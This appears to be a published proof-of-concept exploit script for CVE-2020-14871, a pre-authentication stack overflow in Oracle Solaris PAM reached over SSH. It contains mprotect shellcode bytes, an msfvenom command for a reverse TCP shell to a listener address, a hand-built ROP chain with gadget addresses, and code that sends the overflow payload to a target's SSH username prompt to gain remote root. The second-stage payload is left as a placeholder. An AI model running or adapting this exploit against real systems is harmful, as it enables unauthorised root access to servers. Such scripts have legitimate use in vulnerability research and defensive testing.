Solaris SunSSH 11.0 x86 - libpam Remote Root (3)

# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (3)
# Exploit Author: Nathaniel Singer, Joe Rozner
# Date: 09/11/2020
# CVE: 2020-14871

# Vulnerable Version(s): Oracle Solaris: 9 (some releases), 10 (all releases), 11.0
# Description: CVE-2020-14871 is a critical pre-authentication (via SSH) stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) in Oracle Solaris. PAM is a dynamic authentication component that was integrated into Solaris back in 1997 as part of Solaris 2.6. The vulnerability received a CVSSv3 score of 10.0, the maximum possible score.

# Vendor Homepage: https://www.oracle.com/solaris
# Software Link: https://www.oracle.com/solaris/solaris10/downloads/solaris10-get-jsp-downloads.html
# Tested on: Software Hash (md5): aae1452bb3d56baa3dcb8866ce7e4a08 2254110720: sol-10-u11-ga-x86-dvd.iso

# Notes: We ran into an interesting LIBC descrepancy during testing. The sysenter gadget (0xfebbbbf4), last in the stage one chain, was accessible when the testing VM was running on a MacOS host, however, when we ran the vulnerable Solaris box on a Windows host, that gadget was not located at the same address and we actually were unable to find it anywhere in memory. Hopefully someone smarter than us can figure out why this is, but you may run into this during your testing as well.

#!/usr/bin/python3

from pwn import *

########## BUILD ##########
# mprotect shellcode, stage one to mark the page containing our shellcode as executable
buf = b"\x31\xc0\x31\xc9\xbb\x01\x40\x04\x08\x66\xb8\x01\x40"
buf += b"\xb1\x07\x4b\x48\x51\x50\x53\x53\x89\xe1\x31\xc0\xb0"
buf += b"\x74\xcd\x91"

# Actual stage two shellcode, drop into after mprotect call
# ./msfvenom -p solaris/x86/shell_reverse_tcp -b "\x20\x09\x00\x0d\x0a" LHOST="192.168.1.215" LPORT=4444 -f python
buf += b"<big bad effect here, as a bytestring; limit 512 bytes>"
pad = b'A'* (512-len(buf))

# manual assembly of ROP chain due to pwntools chainer bugs, DWORD returns :/
g = []
g.append(p32(0x080431c3)) #ebp overwrite to prevent ecx corrupt and crash
g.append(p32(0xfed86ca3)) #mov eax, 0x74; ret
g.append(p32(0x08072829)) #pop ebx; ret
g.append(p32(0x08040101)) #write ecx value (0x0a) to address, prevents crash
g.append(p32(0x0805ba07)) #pop ecx; pop edx; pop ebp
g.append(p32(0x08046ee0)) #ptr(0x?,0x0x1000,0x7)
g.append(p32(0x08043001)) #edx pointer to page+1 for mprotect
g.append(p32(0x080431b8)) #unused ebp value
g.append(p32(0x08072261)) #decrement edx so correct page addr
g.append(p32(0xfefe2d8b)) #mov DWORD PTR [ecx+0x4],edx; xor eax; ret
g.append(p32(0xfed86ca3)) #mov eax, 0x74; ret
g.append(p32(0x0805ba08)) #pop edx; pop ebp; ret
g.append(p32(0x080431b8)) #addr of shellcode
g.append(p32(0xfed86ca3)) #unused ebx value
g.append(p32(0xfebb56f6)) #sysenter (ret into sc via edx)
chain = b''.join(g) #assemble the list into a bytestring, final rop chain
print(f"Sending Exploit: {chain}")

########## EXPLOIT ##########
remote_host = "192.168.25.130”
io = process(f'/usr/bin/ssh -l \"\" -o \"PreferredAuthentications keyboard-interactive\" {remote_host}', shell=True, stdin=PTY)

io.recv() #username prompt
io.sendline(buf + pad + chain) #exploit